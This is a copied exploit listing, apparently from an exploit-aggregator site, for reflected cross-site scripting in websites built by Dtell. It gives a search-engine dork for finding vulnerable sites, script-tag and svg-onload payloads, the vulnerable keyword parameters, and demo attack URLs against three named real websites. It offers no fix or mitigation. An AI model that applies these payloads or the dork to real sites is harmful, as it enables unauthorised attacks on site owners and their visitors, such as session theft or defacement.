Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060013

Below is a copy:

Dtell Cross Site Scripting
# Exploit Title : Dtell - Cross Site Scripting
# Author : Xmall75
# Vendor Homepage : www.dtell.com.tw
# Date : 3 June 2020
# Tested on : Windows
# Dork :
intext:"Designed by Dtell"
# Payload :
<script>alert("Xmall75");</script>
<svg onload=alert("Xmall75")>
and other payloads.

# XSS :
site.com/products_search.php?keyword=[your payload here].
site.com/result.php?keyword=[your payload here].

# Demo :
www.sbarcotech.com/products_search.php?keyword=<script>alert("Xmall75");</script>
www.printecht.com/result.php?keyword=<script>alert();</script>
www.tbpchc.com/eng/result.php?keyword=<script>alert();</script>

# [email protected]

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.